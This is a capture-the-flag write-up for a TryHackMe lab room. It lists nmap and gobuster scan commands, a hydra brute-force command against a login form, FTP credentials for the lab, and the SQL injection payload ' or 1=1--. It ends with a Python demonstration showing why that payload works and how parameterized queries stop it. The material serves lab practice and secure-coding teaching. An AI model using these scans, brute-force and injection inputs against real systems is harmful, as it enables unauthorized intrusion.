Avengers Blog
Room Link: https://tryhackme.com/room/avengers
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Kali
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install
./hydra -l groot -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/auth/:username=^USER^&password=^PASS^:F=Incorrect username" -V
Cookies
Get the flag by checking the cookie in the browser's developer console.

HTTP Headers

Enumeration and FTP
Kali
ftp $VICTIM
Username: groot
Password: iamgroot

GoBuster
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
SQL Injection

Username: ' or 1=1--
Password: ' or 1=1--
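
Why this input gets past the login check, and the fix, as an added example that is not part of the original write-up or the room's code. The write-up does not show the backend, so the SQLite database, the users table, the sample credentials and the function names are all assumptions.

```python
import sqlite3

PAYLOAD = "' or 1=1--"  # the value typed into both login fields in the write-up


def make_db():
    # Constructed sample data. Schema and credentials are assumptions; the
    # password is plaintext only to keep the example short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    # Vulnerable form: the input is pasted into the SQL text, so the quote
    # closes the string, "or 1=1" makes the WHERE clause true for every row,
    # and "--" comments out the password check.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return db.execute(query).fetchone(), query


def login_parameterized(db, username, password):
    # Hardened form: placeholders bind the input as data, never as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone(), query


if __name__ == "__main__":
    db = make_db()
    row, query = login_concatenated(db, PAYLOAD, PAYLOAD)
    print("concatenated SQL :", query)
    print("concatenated row :", row)
    row, _ = login_parameterized(db, PAYLOAD, PAYLOAD)
    print("parameterized row:", row)
    row, _ = login_parameterized(db, "admin", "constructed-secret")
    print("valid login row  :", row)
```

With the parameterized query the same input is compared as a literal username and matches no row, while a valid login still succeeds.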


Remote Code Execution and Linux
